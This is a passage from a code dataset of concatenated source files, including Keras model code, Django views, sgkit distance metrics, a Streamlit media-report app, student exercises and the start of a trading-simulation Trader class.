stateful=True)(H);\r\n H = Dense(8)(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dense(4)(H)\r\n H = LeakyReLU(0.1)(H)\r\n LowLevelMean = Dense(1, activation = \"sigmoid\")(H);\r\n \r\n \r\n H2 = g_input\r\n H2 = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True, return_sequences=True)(H2);\r\n H2 = LSTM(8, batch_input_shape=(batch_size, look_back, 1), stateful=True)(H2);\r\n H2 = Dense(8)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dense(4)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n LowLevelVar = Dense(1, activation = \"sigmoid\")(H2);\r\n \r\n H2 = Concatenate()([H2, LowLevelMean]);\r\n \r\n g_V2 = Dense(1,activation='sigmoid', name=\"PredictedVariance\")(H2)\r\n\r\n\r\n #\r\n\r\n H = Concatenate()([H, LowLevelVar])\r\n \r\n g_V1 = Dense(1,activation='sigmoid', name='PredictedMean')(H)\r\n\r\n\r\n generator = Model(g_input,[g_V1, g_V2] , name=\"Generator_model\")\r\n generator.compile(loss='mse', optimizer=self.dopt)\r\n generator.summary()\r\n return generator, g_input\r\n \r\n def create(self, nch = 100):\r\n \r\n g_input = Input(shape=self.inputShape)\r\n H = g_input\r\n H = Conv1D(128, kernel_size=5, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H) \r\n H = LeakyReLU(0.1)(H) \r\n H = Dropout(self.dropout_rate)(H)\r\n H = Conv1D(32, kernel_size=3, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dropout(self.dropout_rate)(H) \r\n H = Flatten()(H)\r\n\r\n H 
= Dense(16)(H)\r\n H = LeakyReLU(0.1)(H)\r\n H = Dense(8)(H)\r\n H = LeakyReLU(0.1)(H) \r\n H = Dropout(self.dropout_rate)(H)\r\n LowLevelMean = Dense(1)(H);\r\n\r\n H2 = g_input\r\n H2 = Conv1D(128, kernel_size=5, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H2) \r\n H2 = LeakyReLU(0.1)(H2) \r\n H2 = Dropout(self.dropout_rate)(H2)\r\n H2 = Conv1D(32, kernel_size=3, strides=2, dilation_rate=1, padding = 'same', activation='relu')(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dropout(self.dropout_rate)(H2) \r\n H2 = Flatten()(H2)\r\n\r\n H2 = Dense(16)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n H2 = Dense(8)(H2)\r\n H2 = LeakyReLU(0.1)(H2)\r\n \r\n H2 = Dropout(self.dropout_rate)(H2)\r\n LowLevelVar = Dense(1)(H2);\r\n H2 = Concatenate()([H2, LowLevelMean]);\r\n \r\n g_V2 = Dense(1,activation='sigmoid', name=\"PredictedVariance\")(H2)\r\n\r\n\r\n #\r\n\r\n H = Concatenate()([H, LowLevelVar])\r\n \r\n g_V1 = Dense(1,activation='sigmoid', name='PredictedMean')(H)\r\n\r\n\r\n generator = Model(g_input,[g_V1, g_V2] , name=\"Generator_model\")\r\n generator.compile(loss='mse', optimizer=self.dopt)\r\n generator.summary()\r\n return generator, g_input\r\n \r\n \r\n def createLossModel(self, overallInput, generatorOutput, observed):\r\n \r\n \r\n H=NormalPDFLogLikelyhoodLayer()([generatorOutput[0],generatorOutput[1], observed]);\r\n lossModel = Model([overallInput,observed],H , name=\"Loss_model\")\r\n lossModel.compile(loss=None, optimizer=\"rmsprop\")\r\n \r\n return lossModel;\r\n ","sub_path":"src/SingleStepGenerator.py","file_name":"SingleStepGenerator.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"491529472","text":"from sklearn.preprocessing import MultiLabelBinarizer\nimport numpy as np\n\nfile_path = '电影类型对应标签文件'\nsave_path = '独热编码的电影类型标签文件'\n\nread_folder = open(file_path, \"r\") # 读取原始标签文件\nlabels = read_folder.read().splitlines() # 将标签文件按行分割\n# 将标签和类别ID对应\nlabel_type = {122714: 1, 122715: 2, 122716: 3, 122717: 4, 122718: 5,\n 122719: 6, 122720: 7, 122721: 8, 122722: 9, 122723: 10,\n 122724: 11, 122725: 12, 122726: 13, 122727: 14, 122728: 15,\n 122729: 16, 122730: 17, 122731: 18, 122732: 19, 122733: 20}\n\nmovies = [] # 保存电影ID\ntypes = [] # 保存类型ID\n# 循环分割每一行,分别保存电影ID和类型ID\nfor lines in labels:\n movies.append(lines.split(\"\\t\", 1)[0])\n types.append(lines.split(\"\\t\", 1)[1])\n\nflag = 1\nlabel_types = []\ntemp = []\nfor i in range(len(movies)):\n if int(movies[i]) == flag:\n temp.append(label_type[int(types[i])])\n elif i == len(movies) - 1:\n label_types.append(temp)\n temp = [label_type[int(types[i])]]\n label_types.append(temp)\n else:\n label_types.append(temp)\n temp = [label_type[int(types[i])]]\n flag = int(movies[i])\n\nprint(flag)\nt = MultiLabelBinarizer().fit_transform(label_types)\nnp.save(save_path, t)\nread_folder.close()\n# p = np.load(save_path)\n","sub_path":"Data_processing/multi_label.py","file_name":"multi_label.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493123804","text":"\nclass WordTypeTemplateExtractor(object):\n\n def __init__(self):\n self.templates = []\n\n def add_template(self, template, extract, new):\n template_length = len(template)\n self.templates.append((template, extract, new))\n self.templates.sort(key=lambda t: len(t[0]), reverse=True)\n\n def extract_all_templates(self, objects, context):\n old_objects = objects\n 
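The Data_processing/multi_label.py record above ultimately reduces to a single call: MultiLabelBinarizer().fit_transform over a list of per-movie genre-id lists. A tiny self-contained illustration with invented ids:

```python
from sklearn.preprocessing import MultiLabelBinarizer

# Invented example: three movies, each tagged with one or more genre ids.
movie_genres = [[1, 3], [2], [1, 2, 20]]

mlb = MultiLabelBinarizer()
encoded = mlb.fit_transform(movie_genres)

print(mlb.classes_)  # [ 1  2  3 20] -- columns are the sorted label ids
print(encoded)       # one row per movie, 1 where the genre applies
# [[1 0 1 0]
#  [0 1 0 0]
#  [1 1 0 1]]
```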
print(old_objects)\n\n # The new objects that replaced the old values\n result = []\n\n # The new array, with the objects replaced\n new_list = []\n\n # Checking on types, so preprocessing the objects\n objects = [type(o) for o in objects]\n\n # Current index in the object loop\n obj_index = 0\n\n while obj_index < len(objects):\n\n # Current object\n o = objects[obj_index]\n\n # Template found on current object\n templated = False\n\n for templ_index, template in enumerate(self.templates):\n\n extraction = {}\n mistake_found = False\n\n # Counter for skipping indices\n counter = 0\n\n for i in range(0, len(template[0])):\n\n if (obj_index + i) >= len(objects):\n mistake_found = True\n break\n if template[0][i] != objects[obj_index + i]:\n mistake_found = True\n break\n\n for extract_index, arg in enumerate(template[1]):\n if arg[0] == i:\n extraction[arg[1]] = old_objects[obj_index + i]\n\n counter += 1\n\n if not mistake_found:\n\n obj_index += counter\n counter = 0\n\n templated = True\n to_add = template[2](extraction, context)\n new_list.append(to_add)\n result.append(to_add)\n break\n\n if not templated:\n print(len(old_objects), obj_index)\n new_list.append(old_objects[obj_index])\n obj_index += 1\n\n return (result, new_list)\n","sub_path":"Sequelizer/src/nlq/temply/extractors.py","file_name":"extractors.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"539457748","text":"import time\nimport numpy as np\n\ndef merge_sort(data):\n\n if len(data) > 1:\n mid = len(data) // 2\n left = data[:mid]\n right = data[mid:]\n\n merge_sort(left)\n merge_sort(right)\n\n i = 0 # for left list\n j = 0 # for right list\n k = 0 # for answer list\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n data[k] = left[i]\n i += 1\n else:\n data[k] = right[j]\n j += 1\n\n k += 1\n\n while i < len(left):\n data[k] = left[i]\n i += 1\n k += 1\n\n while j < len(right):\n data[k] = right[j]\n j += 1\n k += 1\n\n##data = np.random.randint(low = 1, high = 1000, size = 100)\ndata = [5,4,3,2,1]\nprint(\"Before merge sort: {}\".format(data))\nmerge_sort(data)\nprint(\"After merge sort: {}\".format(data))\n","sub_path":"8. 
Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"267591664","text":"from django.shortcuts import render\nfrom django.views.generic import ListView, DetailView\nfrom django.views.generic.edit import CreateView, UpdateView\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.utils.decorators import method_decorator\n\nfrom .models import Post\nfrom images.models import Image\n\n# def articles(request):\n# return render(request, 'articles/articles.html', {})\n\nclass PostsView(ListView):\n '''\n List of articles view\n '''\n model = Post\n context_object_name = 'posts'\n template_name = 'articles/articles.html'\n paginate_by = 10\n # Return prepared list of articles\n def get_queryset(self):\n if self.request.LANGUAGE_CODE == 'en':\n qs = Post.objects.filter(is_deleted=False, lang='en').order_by('-timestamp')\n else:\n qs = Post.objects.filter(is_deleted=False, lang='ru').order_by('-timestamp')\n if not self.request.user.is_authenticated() or not self.request.user.is_staff:\n return qs.exclude(is_private=True) \n return qs\n\n# class PostsHomeView(Posts):\n# template_name = 'home.html'\n\n# def get_queryset(self):\n# return super(PostsHome, self).get_queryset().exclude(rating__lt=10)\n\nclass PostDetailView(DetailView):\n '''\n Specific post view\n '''\n model = Post\n context_object_name = 'post_detail'\n template_name = 'articles/article_detail.html'\n # Return specific post by slug or id (raise 404 page if article wasn't found)\n def get_object(self):\n self_slug = self.kwargs.get('slug', None)\n if self_slug:\n return get_object_or_404(Post, slug=self_slug)\n self_pk = self.kwargs.get('pk', None)\n if self_pk:\n return get_object_or_404(Post, pk=self_pk)\n\nclass PostCreateView(CreateView):\n '''\n Form for creating of a new post\n '''\n model = Post\n context_object_name = 'post'\n template_name = 'articles/article_create.html'\n # Fields allowed for editing\n fields = [\n 'title',\n 'slug',\n 'category',\n 'lang',\n 'marked_body',\n 'is_private',\n ] \n # Set requirements\n @method_decorator(permission_required('post.can_create', raise_exception=True))\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(PostCreateView, self).dispatch(*args, **kwargs) \n # Overrided save-method (need for FK correct saving)\n def form_valid(self, form):\n form.instance.body = Post.raw2html(form.instance.marked_body) # Convert content to html\n form.instance.author = self.request.user\n return super(PostCreateView, self).form_valid(form)\n def get_context_data(self, **kwargs):\n context = super(PostCreateView, self).get_context_data(**kwargs)\n context['images'] = Image.objects.all().order_by('-id')[:10]\n return context\n\nclass PostUpdateView(UpdateView):\n '''\n Form for editing of a specific post\n '''\n model = Post\n context_object_name = 'post'\n template_name = 'articles/article_update.html'\n # Fields allowed for editing\n fields = [\n 'title',\n 'slug',\n 'category',\n 'lang',\n 'marked_body',\n 'is_private',\n 'is_deleted',\n ]\n # Set requirements\n @method_decorator(permission_required('post.can_update', raise_exception=True))\n @method_decorator(login_required)\n def dispatch(self, *args, **kwargs):\n return super(PostUpdateView, self).dispatch(*args, **kwargs)\n # Overrided save-method\n def form_valid(self, form):\n 
form.instance.body = Post.raw2html(form.instance.marked_body) # Convert content to html\n return super(PostUpdateView, self).form_valid(form)\n def get_context_data(self, **kwargs):\n context = super(PostUpdateView, self).get_context_data(**kwargs)\n context['images'] = Image.objects.all().order_by('-id')[:10]\n return context\n","sub_path":"articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541364424","text":"#CSC120Lab08Template\r\n\r\n# Declare Variables\r\na = [\"Euclid\", \"Archimedes\", \"Newton\", \"Descartes\", \"Fermat\",\r\n \"Turing\", \"Euler\", \"Einstein\", \"Boole\", \"Fibonacci\",\r\n \"Nash\", \"Wiles\", \"Cantor\", \"Gauss\", \"Plato\"] # Initial list n == 15\r\nq = 0\r\nj = 0\r\ncnt = 1\r\ntotal_lenght = 0\r\nback_list_together= ''\r\nnames = ''\r\nback = ''\r\nback_names = []\r\nall_first_last = []\r\nd = 0\r\nr = 0\r\ntotal_char =0\r\n#1.\tDisplay a string that consists of the first letter and last letter from each of the names in the list a\r\n# The output should look like “EdAsNn etc. use the + operator or the append() function from prior lab\r\n\r\nfor y in a:\r\n names = names + a[q][0] + a[q][-1]\r\n q = q+1\r\nprint(\"1. A string that consists of the first letter and last letter from each of the names in the list is: \",names)\r\n\r\n#2.\tDisplay list a with all the names reversed that is display\r\n#“dilcuE”, sedemihcrA” etc.\r\n\r\nfor y in a:\r\n back = y[::-1]\r\n\r\n all_first_last.append(back)\r\nprint (\"2. A list a with all the names reversed is: \",all_first_last)\r\n\r\n#3.\tDisplay the total number of characters in the list a Hint: Sum the lengths of each name\r\nfor y in a:\r\n back_list_together = back_list_together + a[d]\r\n d = d+1\r\nprint(\"3. The total number of characters in the list a is: \",len(back_list_together))\r\n# 4.\tIn the prior lab we determined the number of vowels in the list. For this lab, display the number of consonants\r\n# (non-vowels) Use your result from 3. to assist in the calculations\r\ncounts = {i:0 for i in 'BCDFGHJKLMNPQRSTVWXYZ'}\r\nback_list_together = back_list_together.upper()\r\nfor char in back_list_together:\r\n if char in counts:\r\n counts[char] += 1\r\n total_char = total_char + len(char)\r\nprint(\"4. The total number of consonants are: \",total_char)\r\n#5.\tDisplay the number of each letter in the list NOTE ignore case ‘A’ and ‘a’ are to be considered the same.\r\nprint( \"5. The total number of each consonants are : \" ,counts,)\r\n#6.\tDisplay the average length of the strings in the list. Remember to use the results from 3 and divide by n\r\nn = len(a)\r\nprint(\"6. 
The average length of the strings in the list is: \", len(back_list_together) /n )\r\n\r\n\r\n","sub_path":"Sanchez_Fundamentals_Computing_Python_Practice/Sanchez_Lab08.py","file_name":"Sanchez_Lab08.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"61798197","text":"\"\"\"This module implements various distance metrics.\"\"\"\n\nimport numpy as np\nfrom numba import guvectorize\n\nfrom sgkit.typing import ArrayLike\n\n\n@guvectorize( # type: ignore\n [\n \"void(float32[:], float32[:], float32[:])\",\n \"void(float64[:], float64[:], float64[:])\",\n \"void(int8[:], int8[:], float64[:])\",\n ],\n \"(n),(n)->()\",\n nopython=True,\n cache=True,\n)\ndef correlation(x: ArrayLike, y: ArrayLike, out: ArrayLike) -> None: # pragma: no cover\n \"\"\"Calculates the correlation between two vectors.\n\n Parameters\n ----------\n x\n [array-like, shape: (M,)]\n A vector\n y\n [array-like, shape: (M,)]\n Another vector\n out\n The output array, which has the output of pearson correlation.\n\n Returns\n -------\n A scalar representing the pearson correlation coefficient between two vectors x and y.\n\n Examples\n --------\n >>> from sgkit.distance.metrics import correlation\n >>> import dask.array as da\n >>> import numpy as np\n >>> x = da.array([4, 3, 2, 3], dtype='i1')\n >>> y = da.array([5, 6, 7, 0], dtype='i1')\n >>> correlation(x, y).compute()\n 1.2626128\n\n >>> correlation(x, x).compute()\n -1.1920929e-07\n \"\"\"\n m = x.shape[0]\n valid_indices = np.zeros(m, dtype=np.float64)\n\n for i in range(m):\n if x[i] >= 0 and y[i] >= 0:\n valid_indices[i] = 1\n\n valid_shape = valid_indices.sum()\n _x = np.zeros(int(valid_shape), dtype=x.dtype)\n _y = np.zeros(int(valid_shape), dtype=y.dtype)\n\n # Ignore missing values\n valid_idx = 0\n for i in range(valid_indices.shape[0]):\n if valid_indices[i] > 0:\n _x[valid_idx] = x[i]\n _y[valid_idx] = y[i]\n valid_idx += 1\n\n cov = ((_x - _x.mean()) * (_y - _y.mean())).sum()\n denom = (_x.std() * _y.std()) / _x.shape[0]\n\n value = np.nan\n if denom > 0:\n value = 1.0 - (cov / (_x.std() * _y.std()) / _x.shape[0])\n out[0] = value\n\n\n@guvectorize( # type: ignore\n [\n \"void(float32[:], float32[:], float32[:])\",\n \"void(float64[:], float64[:], float64[:])\",\n \"void(int8[:], int8[:], float64[:])\",\n ],\n \"(n),(n)->()\",\n nopython=True,\n cache=True,\n)\ndef euclidean(x: ArrayLike, y: ArrayLike, out: ArrayLike) -> None: # pragma: no cover\n \"\"\"Calculates the euclidean distance between two vectors.\n\n Parameters\n ----------\n x\n [array-like, shape: (M,)]\n A vector\n y\n [array-like, shape: (M,)]\n Another vector\n out\n The output scalar, which has the output of euclidean between two vectors.\n\n Returns\n -------\n A scalar representing the euclidean distance between two vectors x and y.\n\n Examples\n --------\n >>> from sgkit.distance.metrics import euclidean\n >>> import dask.array as da\n >>> import numpy as np\n >>> x = da.array([4, 3, 2, 3], dtype='i1')\n >>> y = da.array([5, 6, 7, 0], dtype='i1')\n >>> euclidean(x, y).compute()\n 6.6332495807108\n\n >>> euclidean(x, x).compute()\n 0.0\n\n \"\"\"\n square_sum = 0.0\n m = x.shape[0]\n # Ignore missing values\n for i in range(m):\n if x[i] >= 0 and y[i] >= 0:\n square_sum += (x[i] - y[i]) ** 2\n out[0] = 
np.sqrt(square_sum)\n","sub_path":"sgkit/distance/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"68891267","text":"import base64\nimport re\nimport pandas as pd\nimport numpy as np\nfrom calendar import Calendar\nimport streamlit as st\nimport MyHelper as mh\nimport my_helper as hp\nimport datetime as dt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n#Application welcome address\n# st.title(\"WELCOME TO THE DEMO VERSION OF OUR MMR REPORT GENERATOR\")\n\n#Import dataset from your PC\nuploaded_files = st.sidebar.file_uploader(\"Upload file\", type=[\"csv\",\"xls\",\"xlsx\"], accept_multiple_files=False)\nif uploaded_files:\n data = pd.read_excel(uploaded_files)\n\n #Import a sample mmr data\n # data = pd.read_excel(\"Daily_report_between_2020-11-09_and_2020-12-09_1608541610.xls\")\n\n #Preprocess the mmr data\n data = mh.PreprocessData(data)\n\n comb_data = pd.DataFrame(columns = data.columns)\n # for media in data[\"Media Type\"].unique():\n\n #---------->GENERATING LISTENERSHIP AND IMPRESSION FOR RADIO<-----------\n #SELECTING MEDIA TYPE\n data = data.copy()[data[\"Media Type\"] == \"Radio\"]\n\n #GENERATING WEEKLY LISTENERS\n #ORIGINAL CODE\n for brand in data[\"Brand\"].unique():\n brand_clean = re.sub(r'[^\\w]', ' ', brand)\n writer = pd.ExcelWriter(f'NEW EXPORT/{brand_clean}.xlsx', engine='xlsxwriter')\n df = data.copy()[data[\"Brand\"] == brand]\n for week in df[\"Week\"].unique():\n week_df = mh.WeeklyListenersData(df, week)\n try:\n listeners = mh.GenerateListeners(week_df, [\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"])\n listeners_final = mh.RestructureListeners([\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"], df, listeners.copy())\n listeners_final.to_excel(writer, sheet_name=f\"{week}\")\n except:\n listeners_final = pd.DataFrame()\n for item in [\"Province\", \"Districts\", \"AREA TYPE\", \"Gender\", \"LSM GROUP\", \"Age Range\"]:\n listeners = pd.DataFrame(index=week_df[\"Station\"].unique(), columns=week_df[item].unique()).fillna(0)\n listeners[f\"{item.upper()} TOTAL\"] = 0\n listeners_final = pd.concat([listeners_final, listeners], axis=1)\n listeners_final.to_excel(writer, sheet_name=f\"{week}\")\n writer.save()\n\n #IMPRESSION\n impression = mh.Impression(data, [\"Province\"])\n\n #FINAL LISTENERSHIP\n final_listeners = pd.DataFrame()\n for brand in impression[\"Brand\"].unique():\n brand_data = impression[impression[\"Brand\"] == brand]\n for week in sorted(brand_data[\"Week\"].unique()):\n try:\n listeners_df = pd.read_excel(f\"NEW EXPORT/{brand_clean}.xlsx\", sheet_name = week, index_col=0)\n brand_week = brand_data[brand_data[\"Week\"] == week]\n for station in sorted(brand_week[\"Station\"].unique()):\n brand_station = brand_week[brand_week[\"Station\"] == station]\n try:\n brand_station[\"Listeners\"] = int(listeners_df.loc[station][\"PROVINCE TOTAL\"]/brand_station.shape[0])\n except:\n brand_station[\"Listeners\"] = 0\n final_listeners = pd.concat([final_listeners, brand_station])\n except:\n brand_station = pd.DataFrame(columns=[\"Listeners\"])\n brand_station[\"Listeners\"] = 0\n final_listeners = pd.concat([final_listeners, brand_station])\n final_listeners[\"Listeners\"] = final_listeners[[\"IMPRESSION\", \"Listeners\"]].apply(lambda x: 0 if x[\"IMPRESSION\"] == 0 else x[\"Listeners\"], axis=1)\n final_listeners[\"Listeners\"] = 
final_listeners[[\"IMPRESSION\", \"Listeners\"]].apply(lambda x: int(x[\"Listeners\"]-x[\"IMPRESSION\"])/(x[\"IMPRESSION\"]-x[\"Listeners\"]) if x[\"IMPRESSION\"] < x[\"Listeners\"] else x[\"Listeners\"],axis=1)\n final_listeners[\"Listeners\"] = final_listeners[\"Listeners\"].apply(lambda x: x*(-1) if x<0 else x)\n final_listeners= final_listeners.reset_index(0, True)\n\n\n\n\n\n data = final_listeners.copy()\n data[\"Count\"] = np.ones(data.shape[0])\n for col in [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]:\n data[col] = data[col].astype(int)\n # comb_data = pd.concat([data, comb_data], 1)\n \n # data = comb_data.copy()\n\n #Get columns an thir data types\n column_dtype = dict(data.dtypes)\n\n #For integers and float\n int_columns = []\n for item in column_dtype.keys():\n if (column_dtype[item] == int) | (column_dtype[item] == float):\n int_columns.append(item)\n # int_columns = int_columns.sort()\n\n #For objects\n obj_columns = []\n for item in column_dtype.keys():\n if column_dtype[item] == object:\n obj_columns.append(item)\n # obj_columns = obj_columns.sort()\n\n\n\n sub_menu = [\"Share of Voice Analysis\", \"Advertising Expenditure Analysis\", \n \"Media Type Analysis\", \"Company, Player & Brand Analysis\", \n \"Campaign Analysis\", \"Spot ID Analysis\", \n \"Sub Brand Analysis\", \"Advert Type Analysis\", \n \"Industry Analysis\", \"Media Exposure Analysis\"]\n defaults = {\n \"Share of Voice Analysis\" : [[\"Brand\", \"Media Type\"], [\"Week\"], [\"Duration\", \"Gross\", \"Count\"]],\n \"Advertising Expenditure Analysis\" : [[\"Brand\", \"Media Type\"], [], [\"Gross\", \"Count\"]],\n \"Media Type Analysis\" : [[\"Media Type\", \"Station\"], [], [\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Company, Player & Brand Analysis\" : [[\"Brand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Campaign Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Spot ID Analysis\" : [[\"Spot ID\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Sub Brand Analysis\" : [[\"SubBrand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Advert Type Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Industry Analysis\" : [[\"Brand\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]],\n \"Media Exposure Analysis\" : [[\"Media Type\"], [], [\"Count\",\"Gross\", \"Duration\", \"IMPRESSION\", \"Listeners\"]]\n }\n\n analysis = st.sidebar.selectbox(\"Select analysis\", sub_menu)\n\n\n #ANALYSIS\n\n #Get the default values for each analysis\n my_default = defaults[analysis]\n value_default = my_default[2]\n row_default = my_default[0]\n column_default = my_default[1]\n\n\n #Print out analysis type\n st.title(analysis.upper())\n\n\n ###Pivot table input \n\n\n #Values, Rows and Columns\n iValues = st.sidebar.multiselect(\"SELECT VALUE\", sorted(int_columns), default = value_default)\n iRows = st.sidebar.multiselect(\"SELECT SEARCH CRITERIA\", sorted(obj_columns), default=row_default)\n iColumns = st.sidebar.selectbox(\"SELECT COLUMN VARIABLES\", sorted(obj_columns, reverse=True))\n\n\n #Get the aggretion function for each value\n aggf = {}\n for item in iValues:\n if item == \"Count\":\n aggf.update({\"Count\":\"count\"})\n else:\n aggf.update({str(item):\"sum\"})\n \n \n #USERS SHOULD SELECT OTHER OPTIONS\n iFilter = st.selectbox(\"FILTER BY WHAT 
VARIABLE\", sorted(obj_columns))\n filterV = st.multiselect(\"BY WHAT?\", sorted(data[iFilter].unique()))\n\n\n #Apply the filter to generate new dataframe\n filtered_data = pd.DataFrame([])\n for value in filterV:\n filtered_data = pd.concat([filtered_data, data[data[iFilter] == value]])\n\n \n #Pivot table\n try:\n if len(filterV) == 0:\n st.title(\"FULL DATA\")\n piv_table = pd.pivot_table(data, values=iValues, index=iRows, margins=True, margins_name = \"GRAND TOTAL\",\n columns=iColumns, fill_value=0, dropna=True, aggfunc = aggf)\n piv_table = piv_table.astype(int)\n\n #Print table to screen\n piv_html = piv_table.to_html()\n st.markdown(piv_html, unsafe_allow_html=True)\n st.markdown(hp.get_table_download_link(piv_table), unsafe_allow_html=True)\n \n if st.sidebar.button(\"Row Percentage\", key=\"k1\"):\n piv = hp.mmr_row(data, iValues, iColumns, iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n if st.sidebar.button(\"Column Percentage\", key=\"k2\"):\n piv = hp.mmr_col(data, iValues, iColumns,iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n else: \n st.title(\"Filter by {}\".format(iFilter))\n piv_table = pd.pivot_table(filtered_data, \n values=iValues, index=iRows, margins=True, margins_name = \"GRAND TOTAL\",\n columns=iColumns, fill_value=0, dropna=True, aggfunc = aggf)\n piv_table = piv_table.astype(int)\n\n #Print table to screen\n piv_html = piv_table.to_html()\n st.markdown(piv_html, unsafe_allow_html=True)\n st.markdown(hp.get_table_download_link(piv_table), unsafe_allow_html=True)\n \n if st.sidebar.button(\"Row Percentage\", key=\"k1\"):\n piv = hp.mmr_row(filtered_data, \n iValues, iColumns, iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n if st.sidebar.button(\"Column Percentage\", key=\"k2\"):\n piv = hp.mmr_col(filtered_data, \n iValues, iColumns,iRows)\n st.table(piv)\n st.markdown(hp.get_table_download_link(piv), unsafe_allow_html=True)\n\n\n except:\n st.write(\"Please make a valid selection\")\nelse:\n st.header(\"Please import your data in the sidebar\")","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"28109756","text":"\nimport re\n\nall_users_lines = []\n\nwith open('allusers_applicants.csv') as f:\n all_users_lines = f.read().splitlines()\n\n\ndef printUserLinesFor(firstName):\n for line in all_users_lines:\n if re.search(firstName, line, re.IGNORECASE):\n print(\"Match: \" + firstName + \" : \" + line)\n\n\nwith open('real_names.txt') as f:\n lines = f.read().splitlines()\n for line in lines:\n first = line.split()[0]\n printUserLinesFor(first)\n","sub_path":"utils/match.py","file_name":"match.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"38033484","text":"#Melhore o DESAFIO 061, perguntando para o usuário se ele quer mostrar mais alguns termos. 
\n #O programa encerrará quando ele disser que quer mostrar 0 termos.\n \nprimeiro_termo = int(input('digite o primeiro termo da PA'))\nrazao = int(input('digite a razão da PA'))\nnum_termos = 0\nsequencia = 0\nultimo_termo = 0\nnumeros_adicionais=1\nprint('os dez primeiros da sequência são:', end=' ')\nwhile num_termos < 10:\n sequencia = primeiro_termo\n primeiro_termo += razao\n num_termos += 1\n print(f'{sequencia}', end=' ')\nwhile not numeros_adicionais==0:\n numeros_adicionais=int(input('\\nquantos termos você quer postar a mais?'))\n inicio = num_termos - 10\n while not inicio==numeros_adicionais:\n primeira_variavel=sequencia+razao\n sequencia+=razao\n inicio+=1\n print(primeira_variavel,end=' ')\nprint('final do programa')\n","sub_path":"Exercicio.62_CV.py","file_name":"Exercicio.62_CV.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"478719505","text":"import time\n\n\nwith open(\"src/2020/1/inputs.txt\", \"r\") as f:\n inputs = list(map(int, f.read().splitlines()))\n tic = time.perf_counter()\n\n for i in inputs:\n for j in inputs:\n if i + j == 2020:\n print(i * j)\n\n toc = time.perf_counter()\n print(f\"Exec in: {(toc - tic)/1000} ms\")\n","sub_path":"src/2020/1/python/1.1.py","file_name":"1.1.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74272854","text":"from orders import *\n\n# Trader superclass\n# all Traders have a trader id, bank balance, blotter, and list of orders to execute\nclass Trader:\n\n def __init__(self, ttype, tid, balance, time):\n self.ttype = ttype # what type / strategy this trader is\n self.trader_id = tid # trader unique ID code\n self.balance = balance # money in the bank\n self.blotter = [] # record of trades executed\n self.customer_order = None # customer orders currently being worked (fixed at 1)\n self.n_quotes = 0 # number of quotes live on LOB\n self.willing = 1 # used in ZIP etc\n self.able = 1 # used in ZIP etc\n self.birthtime = time # used when calculating age of a trader/strategy\n self.profitpertime = 0 # profit per unit time\n self.n_trades = 0 # how many trades has this trader done?\n self.lastquote = None # record of what its last quote was\n self.quantity_remaining = 0 # the quantity that has currently been traded from the last quote\n self.BI_threshold = 1 # the quantity threshold which determines when a BI should be used\n self.reputational_score = None # the last notified 